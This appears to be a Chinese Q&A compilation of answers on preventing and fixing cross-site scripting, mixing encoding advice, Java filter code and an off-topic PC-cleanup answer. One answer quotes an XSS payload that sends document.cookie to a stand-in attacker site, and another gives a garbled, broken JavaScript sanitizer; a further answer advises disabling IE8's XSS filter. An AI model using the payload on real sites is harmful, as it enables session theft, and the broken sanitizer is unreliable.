解決跨站點腳本編制

❶ xss跨站點腳本編制有什麼影響

不可信數據 不可信數據通常是來自HTTP請求的數據，以URL參數、表單欄位、標頭或者Cookie的形式。不過從安全形度來看，來自資料庫、網路伺服器和其他來源的數據往往也是不可信的，也就是說，這些數據可能沒有完全通過驗證。 應該始終對不可信數據

❷ jq.ui.js ibm 跨站點腳本編制怎麼解決

<script type="text/javascript">
$(document).ready(function(){
var url=window.location.href;
window.location.href=HTMLEnCode(url);
});
function HTMLEnCode(str) {
var s = "";
if (str.length == 0) return "";
s = str.replace(/&/g, ">");
s = s.replace(/</g, "");
s = s.replace(/>/g, "");
s = s.replace(/ /g, "");
s = s.replace(/\"/g, "");
s = s.replace(/\'/g, "");
s = s.replace(/\n/g, "");
s = s.replace(/\//g, "");
s = s.replace(/\(/g, "");
s = s.replace(/\)/g, "");
s = s.replace(/\=/g, "");
return s;
} });
</script>

❸ 如何防止跨站點腳本攻擊

你好~
XSS漏洞產生的原因：

跨站點腳本的主要原因是程序猿對用戶的信任。開發人員輕松地認為用戶永遠不會試圖執行什麼出格的事情,所以他們創建應用程序,卻沒有使用任何額外的代碼來過濾用戶輸入以阻止任何惡意活動。另一個原因是,這種攻擊有許多變體，用製造出一種行之有效的XSS過濾器是一件比較困難的事情。
但是這只是相對的，對用戶輸入數據的」編碼」和」過濾」在任何時候都是很重要的，我們必須採取一些針對性的手段對其進行防禦。

如何創造一個良好的XSS過濾器來阻止大多數XSS攻擊代碼

1 .需要重點」編碼」和」過濾」的對象
The URL
HTTP referrer objects
GET parameters from a form
POST parameters from a form
Window.location
Document.referrer
document.location
document.URL
document.URLUnencoded
cookie data
headers data
database data

防禦XSS有一個原則:
以當前的應用系統為中心，所有的進入應用系統的數據都看成是輸入數據(包括從FORM表單或者從資料庫獲取到的數據)，所有從當前應用系統流出的數據都看作是輸出(包括輸出到用戶瀏覽器或向資料庫寫入數據)
對輸入的數據進行」過濾」，對輸出數據進行」編碼」。這里的」編碼」也要注意，必須針對數據具體的上下文語境進行針對性的編碼。例如數據是輸出到HTML中的那就要進行HtmlEncode，如果數據是輸出到javascript代碼中進行拼接的，那就要進行javascriptEncode。
如果不搞清楚數據具體輸出的語境，就有可能因為HtmlParser()和javascriptParser()兩種解析引擎的執行先後問題導致看似嚴密的」編碼」形同虛設。

2. HtmlEncode HTML編碼
它的作用是將字元轉換成HTMLEntities，對應的標準是ISO-8859-1
為了對抗XSS，在HtmlEncode中要求至少轉換以下字元:
& --> &
< --> <
> --> >
" --> "
' --> '
/ --> /
在php中:

htmlentities
http://www.w3school.com.cn/php/func_string_htmlentities.asp
htmlspecialchars
http://www.w3school.com.cn/php/func_string_htmlspecialchars.asp
3. javascriptEncode javascript」編碼」
javascriptEncode與HtmlEncode的編碼方法不同，HtmlEncode是去編碼，而javascriptEncode更多的像轉義，它需要使用」\」對特殊字元進行轉義。從原理上來講，這都符合編碼函數的一個大原則: 將數據和代碼區分開，因為對於HTML Tag來說，我們對其進行」可視化(轉換成可以見字元)」的編碼可以將數據和HTML的界限分開。而對於javascript來說，我們除了要進行編碼之外，還需要對特殊字元進行轉義，這樣攻擊輸入的用於」閉合」的特殊字元就無法發揮作用，從而避免XSS攻擊，除此之外，在對抗XSS時，還要求輸出的變數必須在引號內部，以避免造成安全問題。
escape()
http://www.w3school.com.cn/js/jsref_escape.asp
該方法不會對 ASCII 字母和數字進行編碼，也不會對下面這些 ASCII 標點符號進行編碼： * @ – _ + . / 。其他所有的字元都會被轉義序列(十六進制\xHH)替換。
利用這個編碼函數，不僅能防禦XSS攻擊，還可以防禦一些command注入。

一些開源的防禦XSS攻擊的代碼庫：

PHP AntiXSS
這是一個不錯的PHP庫,可以幫助開發人員增加一層保護，防止跨站腳本漏洞。
https://code.google.com/p/php-antixss/
xss_clean.php filter
https://gist.github.com/mbijon/1098477
HTML Purifier
http://htmlpurifier.org/
xssprotect
https://code.google.com/p/xssprotect/
XSS HTML Filter
http://finn-no.github.io/xss-html-filter/

原文地址：http://resources.infosecinstitute.com/how-to-prevent-cross-site-scripting-attacks/

希望可以幫助到你~望採納哦~謝謝~

❹ 如何防護web 網站一些安全問題,例如 跨站點請求偽造,跨站點腳本編制之類的.

定義一個常量，然後再驗證。

❺ 跨站腳本攻擊,如何利用工具和測試防範跨站點腳本攻擊

跨站點腳本（XSS）允許攻擊者通過利用網際網路伺服器的漏洞來發送惡意代碼到其他用戶。攻擊者利用跨站點腳本（XSS）攻擊向那些看似可信任的鏈接中注入惡意代碼。當用戶點擊了鏈接後，內嵌的程序將被提交並且會在用戶的電腦上執行，這會使黑客獲取訪問許可權並偷走敏感數據。攻擊者使用XSS來攻擊受害者機器上的漏洞並且傳輸惡意代碼而不是攻擊系統本身。 通過用戶輸入的數據返回錯誤消息的Web表格，攻擊者可以修改控制Web頁面的HTML代碼。黑客能夠在垃圾信息中的鏈接里插入代碼或者使用欺詐郵件來誘使用戶對其身份產生信任。 例如攻擊者可以發送帶有URL的郵件給受害人，這個URL指向一個Web站點並且提供瀏覽器腳本作為輸入；或者在博客或諸如Facebook、Twitter這樣的社交網站上發布惡意URL鏈接。當用戶點擊這個鏈接時，該惡意站點以及腳本將會在其瀏覽器上運行。瀏覽器不知道腳本是惡意的並將盲目地運行這個程序，這轉而允許攻擊者的瀏覽器腳本使用站點的功能來竊取cookie或者冒充合法的用戶來完成交易。 一些通常的跨站點腳本預防的最佳實踐包括在部署前測試應用代碼，並且以快速、簡明的方式修補缺陷和漏洞。Web應用開發人員應該過濾用戶的輸入來移除可能的惡意字元和瀏覽器腳本，並且植入用戶輸入過濾代碼來移除惡意字元。通常管理員也可以配置瀏覽器只接受來自信任站點的腳本或者關閉瀏覽器的腳本功能，盡管這樣做可能導致使用Web站點的功能受限。 隨著時代的進步黑客們變得更加先進，使用收集的工具集來加快漏洞攻擊進程。這意味著僅僅部署這些通常的XSS預防實踐是不夠的，保護和預防過程必須從底層開始並持續提升。預防過程必須在開發階段開始，建立在一個牢靠、安全的開發生命周期方法論之上的Web應用在發布版本中不太可能暴露出漏洞。這樣以來，不僅提升了安全性，也改善了可用性而且縮減了維護的總體費用，因為在現場環境中修補問題比在開發階段會花費更多。 威脅建模在XSS預防中也是重要的一個方面，應該納入到每個組織的安全開發生命周期當中。威脅建模評估和辨識在開發階段中應用程序面臨的所有的風險，來幫助Web開發人員更好地理解需要什麼樣的保護以及攻擊一旦得逞將對組織產生怎樣的影響。要辨識一個特定應用的威脅級別，考慮它的資產以及它訪問的敏感信息量是十分重要的。這個威脅建模過程將確保在應用的設計和開發過程中戰略性地融合了安全因素源碼天空 ，並且增強了Web開發人員的安全意識。 對於大型項目的Web開發人員來說，源代碼掃描工具和Web應用漏洞掃描器是提高效率和減少工作量的通常選擇。

❻ 網頁打不開,Internet Explorer 如何幫助保護我免受跨站點腳本攻擊

升級一下瀏覽器。

不行就------------------

清理一下磁碟碎片和系統垃圾。

不行就----------------

請不要盜用我的答案！！

一號方案（新X）

注意（原創）：
1．安全模式下，效果更好！
2. 以下所要使用的軟體，都要安裝或升級到最新版本，以保證使用的效果。
3. 不殺毒，直接使用以下方法也可以 。若效果不好，就先在安全模式下用優質殺毒軟體（如：卡巴斯基）殺一下，360安全衛士最好也用一下，之後，再用以下方法。
（用360安全衛士的「殺木馬」----「全盤掃描」。殺完重啟。）

以下方法，不一定都要用，可以一個一個去試。有時，僅第一個就管用了。

一. 關閉瀏覽器，打開新版本360安全衛士的「系統修復」，掃描後，再點「一鍵修復」 。

再用360急救箱（360安全衛士的「功能大全」里有。若未安裝360安全衛士，也可單另安裝急救箱。）【按步驟操作：先「開始急救」；掃描完後，重啟；再點「系統修復」 （可以全選）――「立即修復」。 接著，點「DLL文件恢復」，添加系統檢測時所得知丟失的DLL文件，再點「立即修復』。「修復網路」視情況而決定是否修復。完後，應重啟。】

二.用360安全衛士的「清理插件」進行掃描，掃除惡意插件後，進行清理。完後應重啟。

三.用windows清理助手（從網上下載）。掃描後(若掃出東西，都勾並清理)，再用故障修復（全選），然後在桌面點滑鼠右鍵刷新。安全模式下效果好。

也可考慮用金山急救箱【勾上「擴展掃描」，點掃描後，如果出現可以修復的項目，全選後，點「立即處理」，完後重啟。】

也可下個IE修復專家 5.21,或雅虎ie修復專家(也有人用黃山修復專家)。，
用完後，你再試試：點網頁上面的 工具->Internet選項->把主頁改成你想要的。

也可：
1. 下載一個金山網盾。（網路里搜索『金山網盾』第一個下載就是最新版本）
2. 安裝後，點一鍵修復。掃出東西後，點立即處理。

強調------1.修復中，殺軟或360有提示時，請點允許。操作中如提示重啟就重啟下電腦。2.效果不好時，看「注意」中的三點。 3. 完後，效果不好的話，也可考慮系統還原一下（選好還原點）。

祝你成功 ！

❼ dwr跨站點腳本編制漏洞怎麼改

您好，您可以查找漏洞存在的文件，然後查看具體哪句代碼或者哪裡結構不合適，然後針對修改即可，如果修改不了，我免費幫您修改

❽ 如何防止跨站點腳本攻擊

防止跨站點腳本攻擊的解決方法：

1.輸入過濾

對每一個用戶的輸入或者請求首部，都要進行過濾。這需要程序員有良好的安全素養，而且需要覆蓋到所有的輸入源。而且還不能夠阻止其他的一些問題，如錯誤頁等。
final String filterPattern="[<>{}\\[\\];\\&]";
String inputStr = s.replaceAll(filterPattern," ");

2.輸出過濾

public static String encode(String data)
{
final StringBuffer buf = new StringBuffer();
final char[] chars = data.toCharArray();
for (int i = 0; i < chars.length; i++)
{
buf.append("&#" + (int) chars[i]);
}
return buf.toString();
}
public static String decodeHex(final String data,
final String charEncoding)
{
if (data == null)
{
return null;
}
byte[] inBytes = null;
try
{
inBytes = data.getBytes(charEncoding);
}
catch (UnsupportedEncodingException e)
{
//use default charset
inBytes = data.getBytes();
}

byte[] outBytes = new byte[inBytes.length];
int b1;
int b2;
int j=0;
for (int i = 0; i < inBytes.length; i++)
{
if (inBytes[i] == '%')
{
b1 = Character.digit((char) inBytes[++i], 16);
b2 = Character.digit((char) inBytes[++i], 16);
outBytes[j++] = (byte) (((b1 & 0xf) << 4) +
(b2 & 0xf));
}
else
{
outBytes[j++] = inBytes[i];
}
}

String encodedStr = null;
try
{
encodedStr = new String(outBytes, 0, j, charEncoding);
}
catch (UnsupportedEncodingException e)
{
encodedStr = new String(outBytes, 0, j);
}
return encodedStr;
}
<!-- Maps the 404 Not Found response code
to the error page /errPage404 -->

<error-page>
<error-code>404</error-code>
<location>/errPage404</location>
</error-page>

<!-- Maps any thrown ServletExceptions
to the error page /errPageServ -->
<error-page>
<exception-type>javax.servlet.ServletException</exception-type>
<location>/errPageServ</location>
</error-page>

<!-- Maps any other thrown exceptions
to a generic error page /errPageGeneric -->
<error-page>
<exception-type>java.lang.Throwable</exception-type>
<location>/errPageGeneric</location>
</error-page>
任何的非servlet例外都被/errPageGeneric路徑捕捉，這樣就可以處理。
Throwable throwable = (Throwable)
request.getAttribute("javax.servlet.error.exception");
String status_code = ((Integer)
request.getAttribute("javax.servlet.error.status_code")).toString( );

3.安裝三方的應用防火牆，可以攔截css攻擊。

附：

跨站腳本不像其他攻擊只包含兩個部分：攻擊者和web站點。
跨站腳本包含三個部分：攻擊者，客戶和web站點。
跨站腳本攻擊的目的是竊取客戶的cookies，或者其他可以證明用戶身份的敏感信息。

攻擊
一個get請求
GET /welcome.cgi?name=Joe%20Hacker HTTP/1.0
Host:
www.vulnerable.site
會產生如下的結果
<HTML>
<Title>Welcome!</Title>
Hi Joe Hacker
<BR>
Welcome to our system
...
</HTML>
但是如果請求被篡改
GET /welcome.cgi?name=<script>alert(document.cookie)</script> HTTP/1.0
Host: www.vulnerable.site
就會得到如下的響應
<HTML>
<Title>Welcome!</Title>
Hi <script>alert(document.cookie)</script>
<BR>
Welcome to our system
...
</HTML>
這樣在客戶端會有一段非法的腳本執行，這不具有破壞作用，但是如下的腳本就很危險了。
http://www.vulnerable.site/welcome.cgi?name=<script>window.open(「http://www.attacker.site/collect.cgi?cookie=」%2Bdocument.cookie)</script>
響應如下：
<HTML>
<Title>Welcome!</Title>
Hi
<script>window.open(「http://www.attacker.site/collect.cgi?cookie=」+document.cookie)</script>
<BR>
Welcome to our system
...
</HTML>
瀏覽器回執行該腳本並將客戶的cookie發到一個攻擊者的網站，這樣攻擊者就得到了客戶的cookie。

❾ 如何解決跨站腳本攻擊

登陸protal後，點擊查看報表，這是protal會發送轉到cognos的請求，如果使用的IE8，則這個請求會被攔截，提示「Internet Explorer 已對此頁面進行了修改，以幫助阻止跨站腳本。單擊此處，獲取詳細信息」。這個錯誤是由於 IE8 的跨站腳本(Cross-site scripting, XSS)防護阻止了跨站發送的請求。請按以下步驟操作：
1. 點擊 IE8 的「工具」-「Internet 選項」，
2. 進入「安全」選項卡，打開「Internet」下方的「自定義級別」，
3.在「安全設置」對話框中找到「啟用 XSS 篩選器」，改為「禁用」即可。